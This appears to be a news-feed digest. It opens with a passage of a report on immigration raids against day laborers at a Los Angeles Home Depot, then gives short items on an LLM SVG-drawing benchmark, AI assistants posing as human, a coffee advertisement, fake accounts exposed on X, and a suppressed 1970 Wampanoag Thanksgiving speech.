CARECEN organizer Jorge Nicolas described the “symbiotic relationship” between big-box home improvement stores and the jornaleros drawn to them: “Home Depot grew because of day laborers. And day laborers grew because of Home Depot.” The “do it yourself” movement didn’t mean just you do the work; it meant you could cut out the contractor and hire cheaper and more exploitable help.

Since it opened in 2004, the CARECEN center has negotiated wages between jornaleros and employers, helped guard against wage theft, provided occupational safety and know-your-rights workshops, and offered free hot meals every day. Some 200 to 400 workers gathered over the course of the day, and the line of vendors wrapped around the corner on both sides of Shatto Street. Before June, ICE agents had restricted their involvement with the Home Depot to “intimidation,” strolling through to “visit” on their off hours, Nicolas said. Now the Home Depot felt like a “funeral.” Nicolas updated the center’s record-keeping practices to protect people’s identities and canceled its daily meal provision.

The construction industry’s margins rely on squeezing labor costs, and contractors turn to temporary workers to perform the most grueling jobs. A quarter of California’s and 40 percent of Los Angeles’s construction workers are undocumented immigrants. Some have lived in the city for decades, while others are recent arrivals. Many, like Arturo, left their families in their country of origin. When Covid-19 shutdowns shuttered his business in Mexico City, Arturo was lured to the United States by the “strength of currency” and the potential for sending remittances to his wife and two kids. He turned to Home Depot when he found other employment options limited by his immigration status.

Jorge, a maintenance worker at a local nursing home who has worked as a day laborer on and off since coming to the United States, said that “a lot of doors are closed” to immigrants “based on our ethnicity and the color of our skin.” He joined LATU over a year ago when his landlord tried to illegally kick him out of his apartment. One day, she’d even changed his locks. With the support of the organization, he managed to secure his housing and his lease. This spring, Jorge was one of many undocumented workers subcontracted to do the most brutal and dangerous work of the city’s wildfire recovery, tasked with power-washing ash and “pure asbestos” from burned-down houses between the Pacific Palisades and Malibu. Recalling the long-term health impacts on 9/11 respondents, he quit. The agency paid him a third of what they’d originally promised.

LATU has compared the economic impact of the ongoing raids to the Covid-19 pandemic. Once again, people have holed up indoors, lost work, and lacked the resources for their biggest monthly expense: the rent. The UC Merced Community and Labor Center likened the scale of job loss in the city to December 2007, the first month of the Great Recession. Those statistics can be felt in empty streets and canceled celebrations , including the massive Central American Independence Day parade. At Los Angeles County Board of Supervisors meetings and local City Council offices , LATU has demanded that city officials back up their anti-Trump rhetoric with policies that will protect undocumented people; an eviction moratorium would give people refuge in their homes.

“In any other organizing situation, you can hold a meeting, you can hold a protest,” Kevin said. But in this case, “the very condition of being out in public is what’s endangering.” Forced to use public space as a workplace, jornaleros and street vendors are among the most vulnerable of DHS targets. And unlike farm workers, they don’t have organized bosses advocating for a stable labor supply. Agribusiness appeals to the Trump administration slowed agricultural raids, but ICE and Border Patrol attacks on day laborers and vendors have only intensified. The economic leverage that forced past waves of legalization and was dramatized in previous “Day Without Immigrants” protests doesn’t exist for those barely hanging on or shut out of work. Throughout the summer, reports circulated of CBP agents rounding up unhoused people.

On June 21, two weeks after the ICE invasion began, agents with black gaiters pulled over their faces leaped from a Dodge Charger on Union Street right next to the Home Depot. They snatched one man from his car, tackl ed and arrested another who tried to intervene, and pepper-sprayed a volunteer in the face from just inches away.

Though agents never crossed into the parking lot, it was the first test of Centro’s response and LATU’s new strategy of defense. “We’re a moral force,” Kevin said, “and hopefully that boosts the morale of people in the area in terms of people who are willing to step in.” Using their documentation of the event as well as their connections to the Labor Center and workers on the ground, they were able to identify the men whom DHS arrested, ensuring they would be connected to their communities and to legal counsel from the Immigrant Defenders Law Center (IMMDEF). DHS often publicizes humiliating photos of arrestees, but never a complete list of names. Without on-the-ground work to identify people taken, they effectively disappear — a family member simply wouldn’t come home one night; a co-worker wouldn’t return the next day.

“The goal of the raids is to isolate,” said Sarah Houston, a lawyer with IMMDEF’s new rapid-response team. DHS often delays or obscures its detainees’ entries into its location databases, making people difficult to track or reach when in custody. It also consistently denies them access to phone calls to contact their loved ones or legal counsel. That two-way isolation helps DHS pressure people to give up their rights to a full immigration hearing and sign voluntary departure agreements.

So do the conditions in detention centers. Designed as a temporary holding facility, the basement of the downtown ICE field office has since June served as a detention center in its own right. Those in custody report being stuck for over a week before transfer, forced to sleep on the floor, lacking access to showers and private bathrooms, and handed bags of potato chips and animal crackers as meals. They are also consistently denied medical care, even when agents’ violence during arrests leave them with cuts, bruises, and even broken bones.

The Adelanto ICE Processing Center, an hour and a half north in San Bernardino, is no better. Run by the second-largest for-profit prison company in the United States, Adelanto has a track record of abysmal conditions — and at least three in-custody deaths — since it opened in 2011. This summer, its captive population quadrupled in just two months. Recent inspections reveal a lack of adequate food, linens, or even beds, and a pattern of withholding necessities like blood-pressure medication. Current detainees have described being “treated like dogs.”

Historically, detained undocumented people with access to legal defense are more than 10 times more likely to avoid deportation. Houston believes the same will hold true today, based on her recent experience securing the release of detainees in immigration and district court. And she’s hopeful about ongoing collaborations between community and legal defense. The documentation that volunteers gather may do more than bear witness to injustice; an illegal arrest can void an entire deportation case. In the meantime, Centro fund-raising efforts help deliver necessities to people inside and support families robbed of their breadwinners.

On July 3, IMMDEF, the ACLU, United Farm Workers, and other immigrant defense organizations filed a class-action lawsuit against the federal government. The suit argued that DHS’s “dragnet” violated the Fourth and Fifth Amendments — protections against unreasonable searches and violations of due process — and discriminated against individuals based on “the color of their skin” or “where they live or work.” A few days later, both the city and county of Los Angeles joined as plaintiffs.

That same week, Kevin watched from his volunteers’ table at the Home Depot as Border Patrol Tactical Units rolled down Wilshire. They were headed two blocks west to MacArthur Park. Soon armored vehicles blocked street traffic, a federal helicopter circled overhead, and nearly 100 agents fanned out through the park, alongside others on horseback. The National Guard helped provide “security.” No arrests were made.

Leaked documents about the operation confirmed that its purpose was a mere “show of presence.” Internal Army assessments claimed that “lethal violence” might result from encroaching on MS-13 “turf” and that the park served “as the largest open-air market of fake identification to enable illegal immigration.” But what agents encountered that day was St. John’s Community Health workers conducting outreach to unhoused people and schoolchildren at day camp. One L.A. City Council member commented that DHS should have “appl for a film permit.”

Overseeing so-called Operation Excalibur on the ground and fielding media requests in its wake was Gregory K. Bovino, the U.S. Border Patrol El Centro sector chief. Bovino was nearly pressured to resign under Biden, in part for posting a photo of himself with an M4 assault rifle on social media. But his star has risen under Trump. Now that photo is his profile pic ture, and he’s made content creation a part of his job. He often posts videos of foot chases at Home Depots set to dramatic soundtracks. In another video post, agents cuff, arrest , and place a sheer bag over the head of a protester “accused of assaulting a federal agent by spitting on him.”

Bovino celebrated Operation Excalibur in a Fox News interview, warning that the country had “better get used to us now, ’cause this is going to be normal very soon.” Bass also claimed victory after the event, as if she’d ordered the agents out of the park, but in her own words, they were already “getting ready to leave.” DHS has exposed the limitations of “sanctuary cities,” a technical designation that blocks local agencies from sharing information with the federal government but does not proactively protect undocumented people. Beyond a yet-unrealized promise of minimal cash assistance and her city attorney’s collaboration in the class-action suit, Bass’s fight against Trump’s deportation efforts has largely been rhetorical.

On July 12, the legal strategy claimed an initial win. A federal court in the Central District of California issued a restraining order preventing ICE and CBP from detaining people based on their race, language, and presence at locations like home improvement stores. For a few weeks, arrest rates did seem to slow. Zoie, the LATU organizer, began planning the best way to wind down the Centro and fold volunteers into the ongoing work of local tenant associations.

But the reprieve was short-lived. Just before 7 a.m. on Aug. 6, a yellow Penske truck pulled into the Home Depot lot from the Union entrance. The driver beckoned workers closer, speaking in Spanish and promising jobs. Then the truck’s rear door rolled up, revealing a cluster of CBP agents and an embedded Fox News reporter. Centro volunteers had just begun setting up their tents. They managed to document agents brandishing rifles at cooktops, coolers, and bags of chips. One street vendor was led away with her hands behind her back, checkered kitchen rag hanging from her belt.

Bovino dubbed the raid “Operation Trojan Horse,” writing on Instagram that the “legendary ruse” was used to “swiftly defeat potentially violent Anti-ICE protesters.” It was a chilling visual echo of a tactic used by the white supremacist Patriot Front, whose supporters had leaped from a Penske truck to disrupt a Pride event in Springfield, Mo., a month prior. It also seemed a blatant violation of the federal court’s restraining order. “For those who thought immigration enforcement had stopped in Southern California, think again,” acting Los Angeles U.S. Attorney Bill Essayli said that day. “There are no sanctuaries from the reach of the federal government.”

A DHS press officer said of the raid that the MacArthur Park Home Depot was once again targeted because local gangs had a “chokehold” on the area. But of the 16 people arrested, none had gang ties or had been convicted of a violent crime. Four were street vendors. Agents claimed they “got past these violent protesters to go conquer MS-13,” Zoie summarized. “No, you tackled a woman making pupusas and left her children without a mother.”

DHS’s emphasis on spectacle may satisfy the right’s thirst for public displays of cruelty. It may also be succeeding in instilling fear in undocumented people. While the ultimate promises of Trump’s deportation schemes — safer cities, better jobs, and cheaper housing for U.S. citizens — haven’t materialized , immigration itself has declined for the first time in nearly 60 years. Anecdotal evidence suggests many immigrants are questioning their ability to stay. “If things don’t change,” Arturo admitted, “I may self-deport.”

During one of my visits to the McArthur Park Home Depot, a worker approached volunteers to thank them for stepping up when he himself could not. Kevin returned the gratitude, but told me he disagreed. Over time, he hoped the Centros could erode the division of labor between defenders and people most at risk. “You’re looking at thousands of family members in L.A. who have had people taken,” he said. “If you do ultimately want to stop what’s happening, it will take the people who are being affected organizing themselves.”

Jorge, the former day laborer, agreed. “We can’t let this fear beat us,” he said, “because eventually, fear will defeat everything.” Jorge called the raids a “massacre.” And the results have been deadly. At least three people died during DHS raids over the summer — among them Roberto Carlos Montoya Valdez, who was struck by a car and killed while fleeing a Home Depot raid in an L.A. suburb. Still, though Jorge’s family in Oaxaca has begged him to return, he has refused. He likened the experience of waiting to be kidnapped to getting touched by the grim reaper. “If I’m gonna die, I’m gonna die protecting my people,” he said. “I’ve got blood family, but these are my people, too. These are my neighbors.”

After the Penske raid, the Centro refined its hours and recommitted to the watch seven days a week. They launched a new shift to protect the three elementary schools in the area, sending volunteers to patrol in a safety vest with “Education sí, migra no” emblazoned on the back. Zoie and Nicolas started planning a new collaboration on roving food distribution, combining CARECEN’s resources and LATU’s network of tenant associations. By then, DHS had begun striking another target, L.A.’s car washes. “We’re catching sudspects across Southern California,” Bovino joked . “Wash, rinse, repeat.”

“They’re kind of like us,” Kevin observed. “Whenever there’s a movement, you try to find [a form] that’s replicable and intelligible.” The Centro model developed in MacArthur Park has been taken up by five other LATU local chapters and more defense organizations at Home Depots across the city. Organizers trade best practices — Centros have abandoned car patrols and added orientations to pull in new leaders — share information, and serve as one another’s support systems as they continue their work.

By late August, volunteers at the MacArthur Park Centro knew they were being watched. On Aug. 21, organizers tracked a suspicious car that twice circled the block and lingered in the Home Depot lot, though no one got out to shop. Sure enough, its plates matched those of a vehicle photographed at a car wash raid the day before. But agents basically admitted who they were; when they drove past the Wilshire table, Zoie said, the passenger leaned out the window and spat at her.

One week later, ICE returned in force, with a half dozen cars and nearly 40 agents. On the Wilshire side, two white vans careened to a stop, effectively blocking the entrances. Agents in fatigues or police vests and jeans jumped out to snatch the first people they could. Zoie picked up the bullhorn. “La migrá esta aqui,” she announced, as she’d rehearsed in her head for months. Many workers had remained close to the entrance and broke into a run down the street. One made a 20-foot leap from the lot onto Burlington Avenue, mangling his ankle. Zoie pointed her phone camera at the agents, their cars, and three jornaleros the agents managed to capture, shouting for their names and emergency contacts.

On the Union side, agents peeled in with equal speed, grabbing a vendor and multiple workers lining the descending ramp to the Home Depot lot. More agents turned against the dozens of volunteers, vendors, workers, and passers-by, escalating into riot dispersal tactics. They deployed pepper spray, scattered half a dozen pepper balls, and set off at least three tear gas canisters. “Back up for your safety,” one agent said, shoving a volunteer. “Get out of our city for our safety,” another volunteer snapped back, before the agent kicked a tear gas canister toward him. Agents tackled one worker to the ground as he tried to escape into the CARECEN center, stripping him of his shirt. “ You don’t belong in our country,” Kevin shouted into the smoke.

Inside the store, the scene “felt like an active shooting,” one witness said. Home Depot employees, day laborers, and vendors streamed in to duck behind the exit’s sliding doors, some already sobbing. The entire event lasted less than five minutes. In all, the agents had taken nine people. They left behind a stinging haze, overturned shopping carts, and a community oscillating between despair and rage. On Shatto Street, a silver Toyota was stranded with its hazards on, plastic to-go containers still waiting on its trunk.

“At least we were here,” Zoie said, hopeful that the Centro’s presence had shortened the length of the raid. She collected a backpack from the asphalt to search for some kind of identification. The volunteers knew their tasks. They reviewed their footage to identify anyone who’d been taken. One isolated a face and went to the lumberyard where he’d often worked to match the image with a name. Others pulled out screenshots of the vehicles to share with the broader response network. CARECEN’s Nicolas made the calls to coordinate the removal of the abandoned Toyota; it wasn’t the first time DHS had taken someone and left their vehicle behind. A vendor told me she had no choice but to continue working, though her head and chest hurt from the gas. “The rent is coming,” she said.

About an hour later, Jay and his father came to the Home Depot to see if a day laborer who hadn’t shown up for work that morning had been taken. Second- and first-generation immigrants with a shared construction business, both had been present at previous raids; in Cypress Park, agents had slammed Jay to the ground and attempted to detain him. Jay said the Trump administration was using the tactics of El Salvador’s strongman president Nayib Bukele “as a template.” He wanted to make sure his worker didn’t end up in Salvadoran prison.

By 9 a.m., the police paid a visit. LAPD Central Bureau Deputy Chief German Hurtado said he and two other officers were present to “share the space” with the community and clarify that the LAPD was not a participant in the raid. But distinguishing his organization from immigration enforcement was all his department would do — any more would be against federal law. “People say, oh, you know, LAPD doesn’t follow the rules and this and that,” Hurtado said, “but now they don’t want us to follow the rules when it comes to obstruction of justice.”

After the agents peeled away, Zoie had dialed the number of one jornalero she saw detained, expecting no answer. Pablo and Zoie had been present almost every day, him leaning on a concrete pylon waiting for work, her watching the entrance. They’d bonded over a shared love of L.A.’s plant life, often texting each other pictures of nature’s odd interactions with urban space. On the morning of the late August raid, Zoie hadn’t gotten a chance to say hello before she spotted Pablo in the Border Patrol van. She was shocked when he picked up the phone. He was already on the bus, heading back to the Home Depot.

“She thought it was the last adios,” Pablo joked when he returned. He said he didn’t run from the agents, which might have given them “reasonable suspicion,” but he had another reason. Though he had crossed the border from Mexico when he was 16, he was a U.S. citizen. Before agents pulled the van into the downtown field office, they finally asked the workers about their immigration status. Pablo told them his Social Security number and handed them his ID. They dumped him out on the corner. He was relieved not to enter the gates. “Every second is forever in there,” he said. “Even the ride they took me on. It felt like forever.”

There will be no official record of Pablo’s seizure. DHS reported that eight people had been arrested at the raid. By September, it listed the location of those I could track as Adelanto Detention Center. Organizers told me that three had already signed agreements to leave the country. “Everybody’s rights have been violated,” Nicolas summarized, from the volunteers’ right to protest to the human right to migrate and make a home wherever you are.

In mid-August, DHS opened its largest detention center in California yet, a hundred miles north of Los Angeles. Once a state prison, the California City facility had been shut down after years of organized pressure. Now it’s operated by CoreCivic, one of many private companies turning the capture of undocumented workers into a revenue stream. Meanwhile, ICE has boasted 175,000 new applicants to its force. By Aug. 26, DHS had made 5,000 arrests in Los Angeles — a rate of 70 a day. And in early September, the restraining order against discriminatory raids was stayed by the Supreme Court, acting through its “ shadow docket .” Bovino celebrated this “vindication” with the hashtag #WhoopsWeDidItAgain. Soon after, he and his army touched down in Chicago.

The challenge of this moment, Kevin said, will be continuing to organize “as the emergency becomes the norm.” Centro volunteers are committed to holding the line at the Home Depot through a daily presence, expanding collaborations with IMMDEF and CARECEN, and deepening relationships with the jornaleros and vendors who also return there each day. Each time their Home Depot had been raided, DHS had used more agents but managed to capture fewer people. LATU’s organizers feel they can slow down the administration’s plans. But to stop the largest deportation project in U.S. history will take much more. “People look to God for help, but God isn’t going to come down to help,” Jorge told me. “God gave us our brains and our hands to do something about it. And so we have to.”

[Tracy Rosenthal is a writer and an organizer. They are a co-author of Abolish Rent: How Tenants Can End the Housing Crisis , published by Haymarket, and their essays, features, and opinions have appeared in The New Republic, The Nation, the Los Angeles Times, and elsewhere. They are now on rent strike in New York City.]

Hammer & Hope is free to read. Sign up for our mailing list, follow us on Instagram, and click here to download this article.

LLM SVG Generation Benchmark

Simon Willison
simonwillison.net
2025-11-25 04:02:25
LLM SVG Generation Benchmark Here's a delightful project by Tom Gally, inspired by my pelican SVG benchmark. He asked Claude to help create more prompts of the form Generate an SVG of [A] [doing] [B] and then ran 30 creative prompts against 9 frontier models - prompts like "an octopus operating a pi...
Original Article

LLM SVG Generation Benchmark ( via ) Here's a delightful project by Tom Gally, inspired by my pelican SVG benchmark . He asked Claude to help create more prompts of the form Generate an SVG of [A] [doing] [B] and then ran 30 creative prompts against 9 frontier models - prompts like "an octopus operating a pipe organ" or "a starfish driving a bulldozer".

Here are some for "butterfly inspecting a steam engine":

Gemini 3.0 Pro Preview drew the best steam engine with nice gradients and a butterfly hovering near the chimney. DeepSeek V3.2-Exp drew a floating brown pill with a hint of a chimney and a butterfly possibly on fire. GLM-4.6 did the second best steam engine with a butterfly nearby. Qwen3-VL-235B-A22B-Thinking did a steam engine that looks a bit like a chests on wheels and a weird purple circle.

And for "sloth steering an excavator":

Claude Sonnet 4.5 drew the best excavator with a blobby sloth driving it. Claude Opus 4.5 did quite a blocky excavator with a sloth that isn't quite recognizable as a sloth. Grok Code Fast 1 drew a green alien standing on a set of grey blocks. Gemini 2.5 Pro did a good excavator with another blobby sloth.

It's worth browsing the whole collection , which gives a really good overall indication of which models are the best at SVG art.

Simple Rule of Thumb: AI Systems Shouldn’t Pretend to Be Human

Daring Fireball
scripting.com
2025-11-25 02:17:24
Dave Winer: The new Amazon Alexa with AI has the same basic problem of all AI bots, it acts as if it’s human, with a level of intimacy that you really don’t want to think about, because Alexa is in your house, with you, listening, all the time. Calling attention to an idea that there’s a pseudo-...
Original Article

It's even worse than it appears..

I'm working today in the internals of FeedLand, specifically the code that determines if an item has changed. When we check a feed, we check each item, if the item already exists, we look at each of the values stored for the item compared with their new values in the feed, and if any have changed, we broadcast the message that the item has changed. I'm doing a complete review of this, based on actual data, and found there were a fair number of places we were calling a change, when nothing that mattered had changed. Now I'm debating whether or not a pubDate change should be seen as an item change. My initial thought when we were working on RSS, was that the pubDate should never change. In the real world of publishing I don't think the publication date changes. Right? Of course some feeds do change the pubDate because that's the art of feeds (sorry for the sarcasm). But I don't think FeedLand should call that a change. Wondering what other feed developers do? So I asked ChatGPT. This is incredibly valuable research . One thing I learned is that people use atom:updated. It's true RSS 2.0 has no item that says when an item updated. Anyway net-net, the consensus is that a change in pubDate is not a change. I don't think I'm going to make it immutable though. #

The new Amazon Alexa with AI has the same basic problem of all AI bots, it acts as if it's human, with a level of intimacy that you really don't want to think about, because Alexa is in your house, with you, listening, all the time. Calling attention to an idea that there's a psuedo-human spying on you is bad. Alexa depends on the opposite impression, that it's just a computer. I think AI's should give up the pretense that they're human, and this one should be first. #

[Sponsor] Dekáf Coffee Roasters — Holiday Gift Bundles

Daring Fireball
dekaf.com
2025-11-25 02:02:12
Meet our new Holiday Gift Bundles, curated sets of our most loved coffees designed for effortless gifting. Nine single origins. Six signature blends. Four Mizudashi cold brews. All micro-lot and top-rated coffees shipped within 24 hours of roasting. No shortcuts. No crash. This is coffee at its mos...
Original Article

DECAF REDEFINED.

JOIN THE DEKÁF REVOLUTION.

We promise decaf coffee indulgence: bold flavor that's gentle on the caffeine. All your favorite parts of coffee without compromise.

GET STARTED

AS FEATURED IN...

  • PREMIUM MICRO-LOT COFFEES

  • SMALL-BATCH ROASTED TO ORDER

  • SHIPPED WITHIN 24HRS OF ROAST

NEW AT DEKÁF!

  • CURATED COFFEE BUNDLES

    Check out our new coffee bundles! Choose between a Light roast, Dark roast, or a curated Roaster's Pick bundle. The perk? No caffeine, and built-in savings per bundle.

    EXPLORE COFFEE BUNDLES

  • CURATED SUBSCRIPTION SETS

    Only interested in Single Origins? Or only coffee Blends? We've curated four new subscription sets so you can sip the way you want.

    EXPLORE SUBSCRIPTION SETS

ENJOY VARIETY IN YOUR SUBSCRIPTION?

  • THE ROASTER'S CHOICE SUBSCRIPTION

    Our full Dekáf collection. Choose fully decaffeinated or low-caff too.

    VIEW

  • decaf coffee

    THE SINGLE ORIGINS SUBSCRIPTION

    A rotating subscription of our nine Single Origin coffees. Fully decaffeinated.

    VIEW

  • THE SIGNATURE BLENDS SUBSCRIPTION

    A rotating subscription of our four Signature Blends. Fully decaffeinated.

    VIEW

  • THE LOW-CAFFEINE SUBSCRIPTION

    A rotating subscription of our two low-caffeine creations 25%-50% caffeinated.

    VIEW

JOURNEY THROUGH OUR DECAFFEINATED

SINGLE ORIGINS

Savor the pure character of each coffee-growing region with our Single Origin Collection. Carefully sourced from select farms and roasted to accentuate each bean’s unique flavor notes, this decaffeinated collection offers a truly distinct taste journey - one origin at a time.

THE SINGLE ORIGIN COLLECTION

COME AND EXPLORE OUR DECAFFEINATED

SIGNATURE BLENDS

Discover our meticulously crafted Signature Blends. Fully decaffeinated, these blends combine complementary beans from around the world. The balanced roasts deliver captivating layers of flavor and perfection for every coffee moment. Never compromise.

THE SIGNATURE BLEND COLLECTION

DIVE INTO OUR

LOW-CAFFEINE BLENDS

Looking to scale back on caffeine without relinquishing the nuanced pleasure of a fine brew? Our lightly caffeinated Dekáf collection offers a refined balance, allowing the preservation of the depth and richness you crave while gently tempering the caffeine for a more mindful experience.

THE LOW-CAFFEINE COLLECTION

KEEP IT COOL WITH DEKÁF'S

MIZUDASHI COLD BREW CONCENTRATES

A gentle brewing method. A quiet kind of coffee. Mizudashi is a traditional Japanese method of brewing coffee with cold water. Instead of steeping, we slow-drip cold water for a smooth, low-acid, refreshing brew with natural sweetness and subtle depth.

THE MIZUDASHI COLLECTION

FOR THE LOVE OF PURE COFFEE...

Dekáf stands for quality without compromise. We're dedicated to creating exceptional decaffeinated coffee that stands toe-to-toe with the world's finest caffeinated beans.

We source premium beans from micro-lot farmers , roast in small batches to every coffee order, and ship within 24 hours of roasting .

Our coffee is bright, nuanced, and full of life.
It's remarkable coffee that just happens to be decaf.

‘A Worthless, Poisoned Hall of Mirrors’

Daring Fireball
www.theatlantic.com
2025-11-25 01:48:34
Charlie Warzel, writing for The Atlantic: X’s decision to show where accounts are based is, theoretically, a positive step in the direction of transparency for the platform, which has let troll and spam accounts proliferate since Musk’s purchase, in late 2022. And yet the scale of the deception ...
Original Article

Over the weekend, Elon Musk’s X rolled out a feature that had the immediate result of sowing maximum chaos. The update, called “About This Account,” allows people to click on the profile of an X user and see such information as: which country the account was created in, where its user is currently based, and how many times the username has been changed. Nikita Bier, X’s head of product, said the feature was “an important first step to securing the integrity of the global town square.” Roughly four hours later, with the update in the wild, Bier sent another post : “I need a drink.”

Almost immediately, “About This Account” stated that many prominent and prolific pro-MAGA accounts, which signaled that they were run by “patriotic” Americans, were based in countries such as Nigeria, Russia, India, and Thailand. @MAGANationX, an account with almost 400,000 followers and whose bio says it is a “Patriot Voice for We The People,” is based in “Eastern Europe (Non-EU),” according to the feature, and has changed its username five times since the account was made, last year. On X and Bluesky, users dredged up countless examples of fake or misleading rage-baiting accounts posting aggressive culture-war takes to large audiences. An account called “Maga Nadine” claims to be living in and posting from the United States but is, according to X, based in Morocco. An “America First” account with 67,000 followers is apparently based in Bangladesh. Poetically, the X handle @American is based in Pakistan, according to the feature.

At first glance, these revelations appear to confirm what researchers and close observers have long known: that foreign actors (whether bots or humans) are posing as Americans and piping political-engagement bait, mis- and disinformation, and spam into people’s timeline. (X and Musk did not respond to my requests for comment.)

X’s decision to show where accounts are based is, theoretically, a positive step in the direction of transparency for the platform, which has let troll and spam accounts proliferate since Musk’s purchase, in late 2022. And yet the scale of the deception—as revealed by the “About” feature—suggests that in his haste to turn X into a political weapon for the far right, Musk may have revealed that the platform he’s long called “the number 1 source of news on Earth” is really just a worthless, poisoned hall of mirrors.

If only it were that simple. Adding to the confusion of the feature’s rollout are multiple claims from users that the “About” function has incorrectly labeled some accounts. The X account of Hank Green, a popular YouTuber, says his account is based in Japan; Green told me Sunday that he’d never been to Japan. Bier posted on X that there were “a few rough edges that will be resolved by Tuesday,” referring to potentially incorrect account information. (On some accounts, a note is appended pointing out that the user may be operating X through a proxy connection, such as a VPN, which would produce misleading information.) For now, the notion that there might be false labels could give any bad actor the ability to claim they’ve been mislabeled.

This is the final post-truthification of a platform that long ago pivoted toward a maxim used by the journalist Peter Pomerantsev to refer to post-Soviet Russia: Nothing is true and everything is possible. This is how you get people apparently faking that the Department of Homeland Security’s account was created in Israel (a claim that has 2 million views and counting); both DHS and Bier had to intervene and assure users that the government’s account was not a foreign actor. High-profile right-wing accounts that previously served as yes-men for Musk—such as Ian Miles Cheong, a Malaysian who purportedly lives in the United Arab Emirates and posts incessant, racist drivel about American politics—have melted down over the platform’s decision to dox users.

Across the site, people are using the feature to try to score political points. Prominent posters have argued that the mainstream media have quoted mislabeled accounts without “minimum due diligence.” This nightmare is not limited to trolls or influencers. On Sunday, the Israel Foreign Ministry posted a screenshot of an account that purported to be reporting news from Gaza, next to a screenshot saying it was based in Poland. “Reporting from Gaza is fake & not reliable. Makes you wonder how many more fake reports have you read?” In response, the person in question posted a video on X on Sunday evening insisting he was in Gaza, living in a tent after military strikes killed his wife and three children. “I’ve been living in Gaza, I am living now in Gaza, and I will continue living in Gaza until I die.”

Watching all of this unfold has been dizzying. On Sunday, I encountered a post claiming that, according to the “About” feature, a popular and verified Islamophobic, pro-Israel account (that posts aggressively about American politics, including calling for Zohran Mamdani’s deportation) was based in “South Asia” and had changed its username 15 times. When I went to X to verify, I noticed that this same account had spent Saturday posting screenshots of other political accounts, accusing them of being fake “Pakistani Garbage.” This is X in 2025: Potentially fake accounts crying at other potentially fake accounts that they aren’t real, all while refusing to acknowledge that they themselves aren’t who they say they are—a Russian nesting doll of bullshit.

There are a few ways to interpret all of this. First is that this is a story about incentives. Platforms not only goad users into posting more and more extreme and provocative content by rewarding them with attention; they also help people monetize that attention. Just before the 2016 election, BuzzFeed ’s Craig Silverman and Lawrence Alexander uncovered a network of Macedonian teens who recognized that America’s deep political divisions were a lucrative vein to exploit and pumped out bogus news articles that were designed to go viral on Facebook, which they then put advertisements on. Today it’s likely that at least some of these bogus MAGA accounts make pennies on the dollar via X’s Creator program , which rewards engaging accounts with a cut of advertising revenue; many of them have the telltale blue check mark.

As Bellingcat ’s Eliot Higgins noted on Bluesky, X’s architecture turns what should be an information ecosystem into a performative one. “Actors aren’t communicating; they’re staging provocations for yield,” he wrote. “The result is disordered discourse: signals detached from truth, identity shaped by escalation, and a feedback loop where the performance eclipses reality itself.” Beyond the attentional and financial rewards, platforms such as X have gutted their trust-and-safety or moderation teams in service of a bastardized notion of free-speech maximalism—creating the conditions for this informational nightmare.

The second lesson here is that X appears to be inflating the culture wars in ultimately unknowable but certainly important ways. On X this weekend, I watched one (seemingly real) person coming to terms with this fact. “Fascinating to look through every account I’ve disagreed with and find out they’re all fake,” they posted on Saturday. To be certain, X is not the main cause for American political division or arguing online, but it is arguably one of its greatest amplifiers. X is still a place where many journalists and editors in newsrooms across America share and consume political news. Political influencers, media personalities, and even politicians will take posts from supposed ordinary accounts and hold them up as examples of their ideological opponents’ dysfunction, corruption, or depravity.

How many of these accounts, arguments, or news cycles were a product of empty rage bait, proffered by foreign or just fake actors? Recent examples suggest the system is easily gamed: 32 to 37 percent of the online activity around Cracker Barrel’s controversial logo change this summer was driven by fake accounts , according to consultants hired by the restaurant chain. It’s impossible to know the extent of this manufactured outrage, but it doesn’t necessarily matter—the presence of so much fakery makes it possible to cast aspersions on any piece of information, any actor, or any conversation to the point that the truth is effectively meaningless.

It’s worth stepping back to see this for what it is: the complete perversion of the actual premise of not just social media but the internet. Although this crisis centers on X, most major social-media networks have fallen victim to variants of this problem. Fakery and manipulation are inevitable for platforms at this scale. Even when Twitter and Facebook were more committed to battling outside influence or enforcing platform rules, they were playing whack-a-mole. The idealism that these companies were founded with—Mark Zuckerberg wanted to connect the world, and Musk has said he wants to maximize free speech (Twitter’s original founders used similar language)—has decayed as they steered their products toward maximizing profits and playing politics . The self-proclaimed techno-utopians in Silicon Valley who have helped build, invest in, or cheerlead for these companies have enabled this ruin. They’ve traded reality for profit and prioritized technologies that aren’t just soulless and amoral, but inhuman in the most literal sense of the word.

A rational response to all of this would be for people to log off. Indeed, that now seems like the least likely, but most optimistic, conclusion—that a group of people who realize they’re being goaded into participation in an algorithmic fun house decide to opt out of a psychologically painful discourse trap altogether. We should all be so lucky.

This Week in People’s History, Nov 26-Dec 2, 2025

Portside
portside.org
2025-11-25 01:11:18
This Week in People’s History, Nov 26-Dec 2, 2025 Jonathan Bennett Mon, 11/24/2025 - 20:11 ...
Original Article

Talk Nice or Shut Up!

NOVEMBER 26 IS THE 55TH ANNIVERSARY of a celebration by the state of Massachusetts to mark the arrival, in 1620, of the ship Mayflower, which carried the first group of pilgrims to North America. The 1970 event was billed as the 350th anniversary of the first Thanksgiving.

The event’s organizers, who conceived of the event as a celebration of brotherhood between the European settlers and the members of the Wampanoag Nation, invited the leader of the Wampanoag Tribe of Gay Head to give a dinner speech. But when the organizers reviewed a draft of the speech, they refused to allow it to be delivered because “the theme of the anniversary celebration is brotherhood and anything inflammatory would be out of place.”

Here are excerpts of the suppressed remarks. Below is a link to the complete speech.

“This is a time of celebration for you - celebrating an anniversary of a beginning for the white man in America. A time of looking back, of reflection. It is with a heavy heart that I look back upon what happened to my People. . . . We, the Wampanoag, welcomed you, the white man, with open arms, little knowing that it was the beginning of the end; that before 50 years were to pass, the Wampanoag would no longer be a free people. . . . here were broken promises - and most of these centered around land ownership. Among ourselves we understood that there were boundaries, but never before had we had to deal with fences and stone walls. But the white man had a need to prove his worth by the amount of land that he owned . . .

Although time has drained our culture, and our language is almost extinct, we the Wampanoags still walk the lands of Massachusetts. We may be fragmented, we may be confused. Many years have passed since we have been a people together. Our lands were invaded. We fought as hard to keep our land as you the whites did to take our land away from us. We were conquered, we became the American prisoners of war in many cases, and wards of the United States Government, until only recently. . . .We forfeited our country. Our lands have fallen into the hands of the aggressor. We have allowed the white man to keep us on our knees. What has happened cannot be changed, but today we must work towards a more humane America, a more Indian America, where men and nature once again are important; where the Indian values of honor, truth, and brotherhood prevail.” https://www.uaine.org/suppressed_speech.htm

‘You Can Protest, But We Can Ignore You’

